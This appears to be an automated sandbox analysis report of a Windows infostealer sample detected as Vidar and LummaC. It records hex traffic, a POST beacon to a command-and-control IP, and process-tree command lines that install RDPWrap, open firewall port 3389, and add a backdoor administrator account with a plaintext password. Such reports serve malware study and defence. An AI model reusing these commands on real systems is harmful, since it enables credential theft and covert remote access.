2024-09-26 22:29:56 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 22:29:56 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 22:29:56 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	57933	5.75.211.162	443	3532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:29:59 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFIEGIECGCBKFIEBGCA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:29:59 UTC	829	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 64 36 34 37 31 33 65 35 64 61 35 32 31 31 36 39 62 36 32 37 37 65 65 62 39 32 36 63 36 35 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 49 45 47 49 45 43 47 43 42 4b 46 49 45 42 47 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="token"0d64713e5da521169b6277eeb926c65a------BAFIEGIECGCBKFIEBGCAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------BAFIEGIECGCBKFIEBGCACont
2024-09-26 22:29:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:29:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:29:59 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Target ID:	0
Start time:	18:28:04
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x4f0000
File size:	413'224 bytes
MD5 hash:	6FD36225FE8B30BEF2BA91748BE1BE69
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:28:04
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:28:04
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xe40000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2843926018.000000000150A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:29:04
Start date:	26/09/2024
Path:	C:\ProgramData\BGDGHJEHJJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\BGDGHJEHJJ.exe"
Imagebase:	0x5b0000
File size:	385'064 bytes
MD5 hash:	47697A60A96C5ADEF362D8DA9A274B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000007.00000002.2752616723.00000000038F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:29:04
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:29:05
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x400000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:29:05
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x300000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:29:05
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd30000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000B.00000002.2870661288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:29:07
Start date:	26/09/2024
Path:	C:\ProgramData\GIJEGDAKEH.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\GIJEGDAKEH.exe"
Imagebase:	0x590000
File size:	413'224 bytes
MD5 hash:	F73186DF5A030CF7F186B0737C3AF1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:29:07
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:29:07
Start date:	26/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xe80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:29:09
Start date:	26/09/2024
Path:	C:\ProgramData\BKJKEBGDHD.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\BKJKEBGDHD.exe"
Imagebase:	0xad0000
File size:	73'216 bytes
MD5 hash:	D02AAA17F2AE30945D65603531DCAE56
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000000.2789350400.0000000000AD2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000F.00000002.3052610087.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\BKJKEBGDHD.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:29:09
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:29:09
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:29:09
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user
Imagebase:	0xe40000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:29:09
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user
Imagebase:	0x8c0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:29:11
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:29:11
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:29:12
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Imagebase:	0x400000
File size:	1'785'344 bytes
MD5 hash:	C213162C86BB943BCDF91B3DF381D2F6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000016.00000000.2818017493.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000016.00000002.2857759824.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000016.00000002.2858987262.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000016.00000000.2818115100.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:29:13
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ECBGHCGCBKFI" & exit
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:29:13
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:29:14
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x380000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:29:14
Start date:	26/09/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Imagebase:	0x7ff7e9470000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:29:15
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpvideominiport.sys
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff70ca70000
File size:	32'600 bytes
MD5 hash:	77FF15B9237D62A5CBC6C80E5B20A492
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	18:29:15
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\rdpdr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	169'984 bytes
MD5 hash:	64991B36F0BD38026F7589572C98E3D6
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	18:29:15
Start date:	26/09/2024
Path:	C:\Windows\System32\drivers\tsusbhub.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	137'728 bytes
MD5 hash:	CC6D4A26254EB72C93AC848ECFCFB4AF
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	35
Start time:	18:29:28
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:29:28
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:29:28
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Imagebase:	0xe40000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:29:28
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Imagebase:	0x8c0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	18:29:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:29:30
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:29:30
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Imagebase:	0xe40000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:29:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Imagebase:	0x8c0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:29:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:29:31
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	18:29:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup
Imagebase:	0xe40000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	18:29:31
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup
Imagebase:	0x8c0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	18:29:32
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	18:29:32
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	18:29:32
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Imagebase:	0xa60000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	18:29:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c net localgroup "Administrators" RDPUser_7fdfafe0 /add
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	18:29:33
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	18:29:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):	true
Commandline:	net localgroup "Administrators" RDPUser_7fdfafe0 /add
Imagebase:	0xe40000
File size:	47'104 bytes
MD5 hash:	31890A7DE89936F922D44D677F681A7F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	18:29:33
Start date:	26/09/2024
Path:	C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\net1 localgroup "Administrators" RDPUser_7fdfafe0 /add
Imagebase:	0x8c0000
File size:	139'776 bytes
MD5 hash:	2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
